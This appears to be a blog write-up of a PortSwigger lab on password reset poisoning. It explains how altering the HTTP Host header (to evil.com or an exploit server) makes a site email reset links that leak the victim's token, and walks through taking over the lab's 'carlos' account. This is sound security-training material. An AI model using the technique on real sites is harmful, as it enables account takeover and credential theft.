PortSwigger: Basic Password Reset Poisoning Writeup

In this article, we’ll be discussing an account takeover technique which use the HTTP host header attack to perform password reset poisoning.

What is Password Reset Poisoning?

Password reset poisoning is a technique which the attacker use to manipulate the vulnerable website password reset HTTP header to let the vulnerable website craft the reset password link with the domain name that the attacker currently controlling.

How Does The Password Reset Works Normally?

These are the steps when a user forgotten their password & wants to reset their account password:-

1. The user goes to the website reset password page, over there it will prompt a textbox ask the user to enter their username/email.
2. The website in the backend there will then check for the existing of the username/email. If the username/email exists, then it will generate an unique reset token which will only be valid for a certain amount of time. The final URL will looks something like this:
   https://example-website.com/reset?token=HSsamQDHCrOyzpkjgL
3. Then, the website will generate a password reset link with a reset token append in the link. This reset token will be unique and this reset token will only be valid for a certain amount of time for the user.
4. The website will then ask the user to check their email inbox & click on the password reset link to reset their password.
5. The user will then click on the password reset link & it will then prompt a windows which ask the user to key in the new password.
6. After input the new password, the account password for the website will then be changed to the new password that the user input.

How Attacker Abuse HTTP Host Header To Steal The Reset Token?

As for some vulnerable websites, when they generate the reset password link they will retrieve the domain name from the HTTP Host Header.

This is an example of an attacker when it manipulate the HTTP Host Header by changing the original domain name to the domain name that the attacker are currently controlling evil-user.net.

In the website backend, the password reset link will be generated and the domain name will get the value from the HTTP host header, so when the password reset link email was sent to the victim, it will looks something like this:

As you can see that now, the email that the victim received, the domain name has change into the attacker currently control domain name, if the victim clicked onto the reset link, the attacker will then captured the victim reset token by checking the attacker’s access log.

Now Time To Dive Into The Practical Part

In this article, we will try the basic password reset poisoning account takeover technique with PortSwigger’s Web Security Lab.

Here’s the scenario for us:

Based on the above scenario:-

1. We can use wiener user as a testing on the exploit as we have access to wiener’s email & vulnerable website’s account.
2. It ask us to takeover carlos user account as carlos user will carelessly clicked on any links that sent to his email.

Finding The Vulnerability On Testing Acount

So now let’s check out the login page first. In the login page we found the ‘Forgot Password’ link, let’s click on it to redirect us to the reset password page.

In the password reset page, it ask the user to enter the username/email and submit it to reset the password of the user. We will try out on wiener user first.

Now we intercept the request packet with our burpsuite. In the POST parameter there’s the part where the username wiener was sent to the website & the HTTP host header is the original website domain name.

After forward the request packet, the webpage will show us this message which tell us to check our email for the reset password link.

Now, let’s check out wiener’s email and this is how the email that received looks like. As we can see that the link generated used the original domain name that looks exactly the same in the HTTP host header with the unique reset password token appended into the link.

When we clicked on the link, it’ll redirect us this page which we can reset the password without entering any old credential.

Now let’s do the reset password process again but this time we alter the HTTP host header to evil.com domain name & forward the request packet.

Now we check wiener’s email again, we notice that the password reset link domain name just changed into evil.com which is the domain name that we input by manipulating the HTTP host header. So we can conclude that this website password reset mechanism is vulnerable to HTTP Host Header Attack (Basic Password Reset Poisoning).

Time To Takeover Carlos’s Account!

Notes (The Carlos user will only click the link that’s from the PortSwigger’s exploit server hostname):
I tried to used NGROK port tunneling technique to pass the reset password token to my local PHP server, it works for wiener’s account when I click on the password reset link my local PHP server able to capture the reset password token.

But, it doesn’t work for Carlos’s user. It doesn’t clicked on my NGROK password reset link! So we just stick on the PortSwigger’s exploit server then

Now let’s takeover Carlos’s account. First we record down the PortSwigger’s exploit server hostname, as we will need to access the exploit server access.log.

Now we edit the /forgot-password HTTP Host Header to our exploit server hostname.

Here, we change the username to carlos as we want to takeover Carlos’s account right now, then forward the packet.

Now, assume that carlos had just clicked on the malicious password reset link, let’s check our exploit server access.log & voila! We just captured the reset password token for carlos’s account.

Using the temporary password reset token, we can access to the page to change Carlos’s user credential.

Now let’s change the password for Carlos’s user.

After changed Carlos’s user credential, let’s login into Carlos’s account with the newly reset credential.

Voila! We just takeover Carlos’s account!